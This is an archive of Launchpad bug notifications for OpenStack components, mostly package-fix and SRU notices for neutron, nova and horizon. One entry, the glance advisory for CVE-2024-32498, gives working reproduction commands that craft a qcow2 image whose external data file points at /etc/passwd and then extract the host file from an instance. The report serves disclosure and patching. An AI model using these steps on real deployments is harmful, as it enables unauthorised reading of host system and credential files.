[Yahoo-eng-team] [Bug 2008943] Re: OVN DB Sync utility cannot find NB DB Port Group
This bug was fixed in the package neutron - 2:18.6.0-0ubuntu1~cloud3 --- neutron (2:18.6.0-0ubuntu1~cloud3) focal-wallaby; urgency=medium . [ Corey Bryant ] * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked from upstream to ensure router ports are marked for needing updates only if they have changed (LP: #2030773). * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked form upstream to fix ACL sync when default security group is created (LP: #2008943). . [ Mustafa Kemal GILOR ] * d/p/add_uplink_status_propagation.patch: Add the 'uplink-status-propagation' extension to ML2/OVN (LP: #2032770). ** Changed in: cloud-archive/wallaby Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/2008943 Title: OVN DB Sync utility cannot find NB DB Port Group Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Released Status in Ubuntu Cloud Archive xena series: Fix Released Status in neutron: In Progress Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: Runtime exception: ovsdbapp.backend.ovs_idl.idlutils.RowNotFound: Cannot find Port_Group with name=pg_aa9f203b_ec51_4893_9bda_cfadbff9f800 can occure while performing database sync between Neutron db and OVN NB db using neutron-ovn-db-sync-util. This exception occures when the `sync_networks_ports_and_dhcp_opts()` function ends up implicitly creating a new default security group for a tenant/project id. This is normally ok but the problem is that `sync_port_groups` was already called and thus the port_group does not exists in NB DB. When the `sync_acls()` is called later there is no port group found and exception occurs. Quick way to reproduce on ML2/OVN: - openstack project create test_project - openstack create network --project test_project test_network - openstack port delete $(openstack port list --network test_network -c ID -f value) # since this is an empty network only the metadata port should get listed and subsequently deleted - openstack security group delete test_project So now that you have a network without a metadata port in it and no default security group for the project/tenant that this network belongs to run neutron-ovn-db-sync-util --config-file /etc/neutron/neutron.conf --config-file /etc/neutron/plugins/ml2/ml2_conf.ini --ovn- neutron_sync_mode migrate The exeption should occur Here is a more realistic scenario how we can run into this with ML2/OVS to ML2/OVN migration. I am also including why the code runs into it. 1. ML2/OVS enviroment with a network but no default security group for the project/tenant associated with the network 2. Perform ML2/OVS to ML2/OVN migration. This migration process will run neutron-ovn-db-sync-util with --migrate 3. During the sync we first sync port groups[1] from Neutron DB to OVN DB 4. Then we sync network ports [2]. The process will detect that the network in question is not part of OVN NB. It will create that network in OVN NB db and along with that it will create a metadata port for it(OVN network requires metadataport). The Port_create call will implicitly notify _ensure_default_security_group_handler which will not find securty group for that tenant/project id and create one. Now you have a new security group with 4 new default security group rules. 5. When sync_acls[4] runs it will pick up those 4 new rules but commit to NB DB will fail since the port_group(aka security group) does not exists in NB DB [1] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L104 [2] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L10 [3] https://opendev.org/openstack/neutron/src/branch/master/neutron/db/securitygroups_db.py#L915 [4] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L107 = Ubuntu SRU Details = [Impact] See bug description. [Test Case] Deploy openstack with OVN. Follow steps in "Quick way to reproduce on ML2/OVN" from bug description. [Where problems could occur] The fix mitigates the occurrence of the runtime exception, however the fix retries to sync port groups one more time, so there is potential for the same runtime exception to be raised. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2008943/+subscriptions -- Mailing list: https://launchpad.n
[Yahoo-eng-team] [Bug 2030773] Re: OVN DB Sync always logs warning messages about updating all router ports
This bug was fixed in the package neutron - 2:18.6.0-0ubuntu1~cloud3 --- neutron (2:18.6.0-0ubuntu1~cloud3) focal-wallaby; urgency=medium . [ Corey Bryant ] * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked from upstream to ensure router ports are marked for needing updates only if they have changed (LP: #2030773). * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked form upstream to fix ACL sync when default security group is created (LP: #2008943). . [ Mustafa Kemal GILOR ] * d/p/add_uplink_status_propagation.patch: Add the 'uplink-status-propagation' extension to ML2/OVN (LP: #2032770). ** Changed in: cloud-archive/wallaby Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/2030773 Title: OVN DB Sync always logs warning messages about updating all router ports Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Released Status in Ubuntu Cloud Archive xena series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: Reported at: https://bugzilla.redhat.com/show_bug.cgi?id=2225156 The ovn-db-sync script does not check if the router ports are actually out-of-sync before adding it to the list of ports that needs to be updated, this can create red herring problems by introducing an irrelevant piece of information [0] in the sync report (specially when ran in "log" mode) making the user think that the databases might be out-of-sync even when it is not. Looking at the code [1] we can see that the comment talks about checking the networks and ipv6_ra_configs changes but it does neither; instead, it adds every router port to the list of ports that needs to be updated. # We dont have to check for the networks and # ipv6_ra_configs values. Lets add it to the # update_lrport_list. If they are in sync, then # update_router_port will be a no-op. update_lrport_list.append(db_router_ports[lrport]) This LP is about changing this behavior and checking for such differences in the router ports before marking them to be updated. [0] 2023-07-24 11:46:31.391 952358 WARNING networking_ovn.ovn_db_sync [req-1081a8a6-82dd-431c-a2ab-f58741dc1677 - - - - -] Router Port port_id=f164c0f1-8ac8-4c45-bba9-8c723a30c701 needs to be updated for networks changed [1] https://github.com/openstack/neutron/blob/c453813d0664259c4da0d132f224be2eebe70072/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L553-L557 = Ubuntu SRU Details = [Impact] See bug description above. [Test Case] Deploy openstack with OVN and multiple routers. Run the ovn-db-sync script and ensure router ports that are not out of sync are not marked to be updated. [Where problems could occur] If the _is_router_port_changed() function had a bug there would be potential for ports to be filtered out that need updating. Presumably this is not the case, but that is a theoritical potential for where problems could occur. All of these patches have already landed in the corresponding upstream branches. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2030773/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 2032770] Re: [SRU] [OVN] port creation with --enable-uplink-status-propagation does not work with OVN mechanism driver
This bug was fixed in the package neutron - 2:18.6.0-0ubuntu1~cloud3 --- neutron (2:18.6.0-0ubuntu1~cloud3) focal-wallaby; urgency=medium . [ Corey Bryant ] * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked from upstream to ensure router ports are marked for needing updates only if they have changed (LP: #2030773). * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked form upstream to fix ACL sync when default security group is created (LP: #2008943). . [ Mustafa Kemal GILOR ] * d/p/add_uplink_status_propagation.patch: Add the 'uplink-status-propagation' extension to ML2/OVN (LP: #2032770). ** Changed in: cloud-archive/wallaby Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/2032770 Title: [SRU] [OVN] port creation with --enable-uplink-status-propagation does not work with OVN mechanism driver Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Released Status in Ubuntu Cloud Archive xena series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: [Impact] This SRU is a backport of https://review.opendev.org/c/openstack/neutron/+/892895 to the respective Ubuntu and UCA releases. The patch is merged to all respective upstream branches (master & stable/[u,v,w,x,y,z,2023.1(a)]). This SRU intends to add the missing 'uplink-status-propagation' extension to ML2/OVN. This extension is already present and working in ML2/OVS, and it is supported by ML2/OVN but the extension is somehow not added to ML2/OVN. The patch simply adds the missing extension to the ML2/OVN too. The impact of this is visible for the deployments migrating from ML2/OVS to ML2/OVN. The following command fails to work on ML2/OVN: ``` openstack port create --network 8d30fb08-2c6a-42fd-98c4-223d345c8c4f --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa # BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status' ``` The fix corrects this behavior by adding the missing extension. [Test Case] - Deploy a Focal/Yoga cloud: - ./generate-bundle.sh -s focal -r yoga --name test-focal-yoga-stack --run --ovn # After the dust settles - ./configure - source ./novarc - openstack port create --network --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa - It should fail with "BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status'" To confirm the fix, repeat the scenario and observe that the error disappears and port creation succeeds. [Regression Potential] The patch is quite trivial and should not affect any deployment negatively. The extension is optional and disabled by default. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2032770/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1999814] Re: [SRU] Allow for specifying common baseline CPU model with disabled feature
Hello Paul, or anyone else affected, Accepted nova into yoga-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:yoga-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-yoga-needed to verification-yoga-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-yoga-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Also affects: cloud-archive Importance: Undecided Status: New ** Also affects: cloud-archive/ussuri Importance: Undecided Status: New ** Also affects: cloud-archive/yoga Importance: Undecided Status: New ** Changed in: cloud-archive Status: New => Invalid ** Changed in: cloud-archive/yoga Status: New => Fix Committed ** Tags added: verification-yoga-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1999814 Title: [SRU] Allow for specifying common baseline CPU model with disabled feature Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive yoga series: Fix Committed Status in OpenStack Compute (nova): Expired Status in OpenStack Compute (nova) ussuri series: New Status in OpenStack Compute (nova) victoria series: Won't Fix Status in OpenStack Compute (nova) wallaby series: Won't Fix Status in OpenStack Compute (nova) xena series: Won't Fix Status in OpenStack Compute (nova) yoga series: New Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Won't Fix Status in nova source package in Focal: Fix Released Status in nova source package in Jammy: Fix Released Bug description: SRU TEMPLATE AT THE BOTTOM *** Hello, This is very similar to pad.lv/1852437 (and the related blueprint at https://blueprints.launchpad.net/nova/+spec/allow-disabling-cpu- flags), but there is a very different and important nuance. A customer I'm working with has two classes of blades that they're trying to use. Their existing ones are Cascade Lake-based; they are presently using the Cascadelake-Server-noTSX CPU model via libvirt.cpu_model in nova.conf. Their new blades are Ice Lake-based, which is a newer processor, which typically would also be able to run based on the Cascade Lake feature set - except that these Ice Lake processors lack the MPX feature defined in the Cascadelake-Server- noTSX model. The result of this is evident when I try to start nova on the new blades with the Ice Lake CPUs. Even if I specify the following in my nova.conf: [libvirt] cpu_mode = custom cpu_model = Cascadelake-Server-noTSX cpu_model_extra_flags = -mpx That is not enough to allow Nova to start; it fails in the libvirt driver in the _check_cpu_compatibility function: 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last): 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 771, in _check_cpu_compatibility 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self._compare_cpu(cpu, self._get_cpu_info(), None) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 8817, in _compare_cpu 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u}) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Unacceptable CPU info: CPU doesn't have compatibility. 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service During handling of the above exception, another exception occurred: 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most
[Yahoo-eng-team] [Bug 2024258] Re: Performance degradation archiving DB with large numbers of FK related records
Hello melanie, or anyone else affected, Accepted nova into yoga-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:yoga-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-yoga-needed to verification-yoga-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-yoga-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Also affects: cloud-archive Importance: Undecided Status: New ** Also affects: cloud-archive/ussuri Importance: Undecided Status: New ** Also affects: cloud-archive/yoga Importance: Undecided Status: New ** Changed in: cloud-archive Status: New => Invalid ** Changed in: cloud-archive/yoga Status: New => Fix Committed ** Tags added: verification-yoga-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2024258 Title: Performance degradation archiving DB with large numbers of FK related records Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive yoga series: Fix Committed Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) antelope series: In Progress Status in OpenStack Compute (nova) wallaby series: In Progress Status in OpenStack Compute (nova) xena series: In Progress Status in OpenStack Compute (nova) yoga series: In Progress Status in OpenStack Compute (nova) zed series: In Progress Status in nova package in Ubuntu: Won't Fix Status in nova source package in Focal: Fix Released Status in nova source package in Jammy: Fix Released Bug description: [Impact] Originally, Nova archives deleted rows in batches consisting of a maximum number of parent rows (max_rows) plus their child rows, all within a single database transaction. This approach limits the maximum value of max_rows that can be specified by the caller due to the potential size of the database transaction it could generate. Additionally, this behavior can cause the cleanup process to frequently encounter the following error: oslo_db.exception.DBError: (pymysql.err.InternalError) (3100, "Error on observer while running replication hook 'before_commit'.") The error arises when the transaction exceeds the group replication transaction size limit, a safeguard implemented to prevent potential MySQL crashes [1]. The default value for this limit is approximately 143MB. [Fix] An upstream commit has changed the logic to archive one parent row and its related child rows in a single database transaction. This change allows operators to choose more predictable values for max_rows and achieve more progress with each invocation of archive_deleted_rows. Additionally, this commit reduces the chances of encountering the issue where the transaction size exceeds the group replication transaction size limit. commit 697fa3c000696da559e52b664c04cbd8d261c037 Author: melanie witt CommitDate: Tue Jun 20 20:04:46 2023 + database: Archive parent and child rows "trees" one at a time [Test Plan] 1. Create an instance and delete it in OpenStack. 2. Log in to the Nova database and confirm that there is an entry with a deleted_at value that is not NULL. select display_name, deleted_at from instances where deleted_at <> 0; 3. Execute the following command, ensuring that the timestamp specified in --before is later than the deleted_at value: nova-manage db archive_deleted_rows --before "XXX-XX-XX XX:XX:XX" --verbose --until-complete 4. Log in to the Nova database again and confirm that the entry has been archived and removed. select display_name, deleted_at from instances where deleted_at <> 0; [Where problems could occur] The commit changes the logic for archiving deleted entries to reduce the size of transactions generated during the operation. If the patch contains errors, it will only impact the archiving of deleted entries and will not affect other functionalities. [1] https://bugs.mysql.com/bug.php?id=84785 [Original Bug Description] Observed downstream in a large scale cluster with constant create/delete server activity and hundreds of thousands of deleted instances rows. Currently, we archiv
[Yahoo-eng-team] [Bug 2059809] Re: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
This bug was fixed in the package glance - 2:29.0.0~b2+git2024080717.695fcb67-0ubuntu1~cloud0 --- glance (2:29.0.0~b2+git2024080717.695fcb67-0ubuntu1~cloud0) noble-dalmatian; urgency=medium . * New upstream release for the Ubuntu Cloud Archive. . glance (2:29.0.0~b2+git2024080717.695fcb67-0ubuntu1) oracular; urgency=medium . * New upstream snapshot for OpenStack Dalmatian. * d/control: Align (Build-)Depends with upstream. * d/p/CVE*.patch: Drop, included in snapshot. . glance (2:28.0.1-0ubuntu3) oracular; urgency=medium . * SECURITY UPDATE: Arbitrary file access via custom QCOW2 external data (LP: #2059809) - debian/patches/CVE-2024-32498-1.patch: reject qcow files with data-file attributes. - debian/patches/CVE-2024-32498-2.patch: extend format_inspector for QCOW safety. - debian/patches/CVE-2024-32498-3.patch: add VMDK safety check. - debian/patches/CVE-2024-32498-4.patch: reject unsafe qcow and vmdk files. - debian/patches/CVE-2024-32498-5.patch: add QED format detection to format_inspector. - debian/patches/CVE-2024-32498-6.patch: add file format detection to format_inspector. - debian/patches/CVE-2024-32498-7.patch: add safety check and detection support to FI tool. - CVE-2024-32498 ** Changed in: cloud-archive Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to Glance. https://bugs.launchpad.net/bugs/2059809 Title: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498) Status in Cinder: Fix Released Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Glance: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Security Advisory: Fix Released Bug description: OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files. QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered. Steps to Reproduce: - Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it. - Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`. - Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`. - Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`. With the non-bootable instance there might be two ways to continue: Option 1: - Derive a new image: `openstack server image create --name "my-leak" "my-instance"` - Download the image: `openstack image save --file "leak.qcow2" "my-leak"` - The file content starts at guest cluster 0 Option 2: (this is untested because I reproduced it only in a production system) - Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`. - Go to the Dashboard, open the console of the instance and login to the instance. - Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods. - It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file. To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1728031] Re: [SRU] Unable to change user password when ENFORCE_PASSWORD_CHECK is True
This bug was fixed in the package horizon - 4:25.0.0+git2024080809.d171cee3-0ubuntu1~cloud0 --- horizon (4:25.0.0+git2024080809.d171cee3-0ubuntu1~cloud0) noble-dalmatian; urgency=medium . * New upstream release for the Ubuntu Cloud Archive. . horizon (4:25.0.0+git2024080809.d171cee3-0ubuntu1) oracular; urgency=medium . * New upstream snapshot for OpenStack Dalmatian: - Refresh xstatic assets. - d/p/lp1728031.patch: removed. patch was merged to upstream. - d/p/lp2054799.patch: removed. patch was merged to upstream. . horizon (4:24.0.0-0ubuntu3) oracular; urgency=medium . * d/u/_styles.scss: use static_url variable instead of absolute path (LP: #2067632). . horizon (4:24.0.0-0ubuntu2) oracular; urgency=medium . [ Rodrigo Barbieri ] * d/p/lp1728031.patch: Fix admin unable to reset user's password. (LP: #1728031) . [ Zhang Hua ] * d/p/lp2054799.patch: Fix Users/Groups tab list when a domain context is set. (LP: #2054799) ** Changed in: cloud-archive Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/1728031 Title: [SRU] Unable to change user password when ENFORCE_PASSWORD_CHECK is True Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: After following the security hardening guidelines: https://docs.openstack.org/security-guide/dashboard/checklist.html#check-dashboard-09-is-enforce-password-check-set-to-true After this check is enabled Check-Dashboard-09: Is ENFORCE_PASSWORD_CHECK set to True The user password cannot be changed. The form submission fails by displaying that admin password is incorrect. The reason for this is in keystone.py in openstack_dashboard/api/keystone.py user_verify_admin_password method uses internal url to communicate with the keystone. line 500: endpoint = _get_endpoint_url(request, 'internalURL') This should be changed to adminURL === SRU Description === [Impact] Admins cannot change user's password as it gives an error saying that the admin's password is incorrect, despite being correct. There are 2 causes: 1) due to the lack of user_domain being specified when validating the admin's password, it will always fail if the admin is not registered in the "default" domain, because the user_domain defaults to "default" when not specified. 2) even if the admin user is registered in the "default" domain, it may fail due to the wrong endpoint being used in the request to validate the admin's password. The issues are fixed in 2 separate patches [1] and [2]. However, [2] is introducing a new config option, while [1] alone is also enough to fix the occurrence on some deployments. We are including only [1] in the SRU. [Test Plan] Part 1/2) Test case 1. Setting up the env, ensure ENFORCE_PASSWORD_CHECK is set to True 1a. Deploy openstack env with horizon/openstack-dashboard 1b. Set up admin user in a domain not named "default", such as "admin_domain". 1c. Set up any other user, such as demo. Preferably in the admin_domain as well for convenience. 2. Reproduce the bug 2a. Login as admin and navigate to Identity > Users 2b. On the far right-hand side of the demo user row, click the options button and select Change Password 2c. Type in any new password, repeat it below, and type in the admin password. Click Save and you should see a message "The admin password is incorrect" 3. Install package that contains the fixed code 4. Confirm fix 5a. Repeat steps 2a-2c 5b. The password should now be saved successfully Part 2/2) Expected failures Check that password changes will continue to fail in scenarios where it is expected to fail, such as: - admin password incorrect - user not authorized cases (comment #35) [Where problems could occur] The code is a 1-line change that was tested in upstream CI (without the addition of bug-specific functional tests) from master(Caracal) to stable/zed without any issue captured. No side effects or risks are foreseen. Usage of fix [1] has also been tested manually without fix [2] and still worked. Worst case scenario, the ability to change password that currently does not work will
[Yahoo-eng-team] [Bug 2054799] Re: [SRU] Issue with Project administration at Cloud Admin level
This bug was fixed in the package horizon - 4:25.0.0+git2024080809.d171cee3-0ubuntu1~cloud0 --- horizon (4:25.0.0+git2024080809.d171cee3-0ubuntu1~cloud0) noble-dalmatian; urgency=medium . * New upstream release for the Ubuntu Cloud Archive. . horizon (4:25.0.0+git2024080809.d171cee3-0ubuntu1) oracular; urgency=medium . * New upstream snapshot for OpenStack Dalmatian: - Refresh xstatic assets. - d/p/lp1728031.patch: removed. patch was merged to upstream. - d/p/lp2054799.patch: removed. patch was merged to upstream. . horizon (4:24.0.0-0ubuntu3) oracular; urgency=medium . * d/u/_styles.scss: use static_url variable instead of absolute path (LP: #2067632). . horizon (4:24.0.0-0ubuntu2) oracular; urgency=medium . [ Rodrigo Barbieri ] * d/p/lp1728031.patch: Fix admin unable to reset user's password. (LP: #1728031) . [ Zhang Hua ] * d/p/lp2054799.patch: Fix Users/Groups tab list when a domain context is set. (LP: #2054799) ** Changed in: cloud-archive Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/2054799 Title: [SRU] Issue with Project administration at Cloud Admin level Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: [Impact] We are not able to see the list of users and groups assigned to a project in Horizon. [Test Case] Please refer to [Test steps] section below. [Regression Potential] The fix ed768ab is already in the upstream main, stable/2024.1, stable/2023.2 branches, so it is a clean backport and might be helpful for deployments using dashboard. Regressions would likely manifest in the users/groups tabs when listing users. [Others] Original Bug Description Below === We are not able to see the list of users assigned to a project in Horizon. Scenario: - Log in as Cloud Admin - Set Domain Context (k8s) - Go to projects section - Click on project Permissions_Roles_Test - Go to Users Expectation: Get a table with the users assigned to this project. Result: Get an error - https://i.imgur.com/TminwUy.png [attached] [Test steps] 1, Create an ordinary openstack test env with horizon. 2, Prepared some test data (eg: one domain k8s, one project k8s, and one user k8s-admain with the role k8s-admin-role) openstack domain create k8s openstack role create k8s-admin-role openstack project create --domain k8s k8s openstack user create --project-domain k8s --project k8s --domain k8s --password password k8s-admin openstack role add --user k8s-admin --user-domain k8s --project k8s --project-domain k8s k8s-admin-role $ openstack role assignment list --project k8s --names ++---+---+-+++---+ | Role | User | Group | Project | Domain | System | Inherited | ++---+---+-+++---+ | k8s-admin-role | k8s-admin@k8s | | k8s@k8s ||| False | ++---+---+-+++---+ 3, Log in horizon dashboard with admin user(eg: admin/openstack/admin_domain). 4, Click 'Identity -> Domains' to set domain context to the domain 'k8s'. 5, Click 'Identity -> Project -> k8s project -> Users'. 6, This is the result, it said 'Unable to disaply the users of this project' - https://i.imgur.com/TminwUy.png 7, These are some logs ==> /var/log/apache2/error.log <== [Fri Feb 23 10:03:12.201024 2024] [wsgi:error] [pid 47342:tid 140254008985152] [remote 10.5.3.120:58978] Recoverable error: 'e900b8934d11458b8eb9db21671c1b11' ==> /var/log/apache2/ssl_access.log <== 10.5.3.120 - - [23/Feb/2024:10:03:11 +] "GET /identity/07123041ee0544e0ab32e50dde780afd/detail/?tab=project_details__users HTTP/1.1" 200 1125 "https://10.5.3.120/identity/07123041ee0544e0ab32e50dde780afd/detail/"; "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" [Some Analyses] This action will call this function in horizon [1]. This function will firstly get a list of users
[Yahoo-eng-team] [Bug 2054799] Re: [SRU] Issue with Project administration at Cloud Admin level
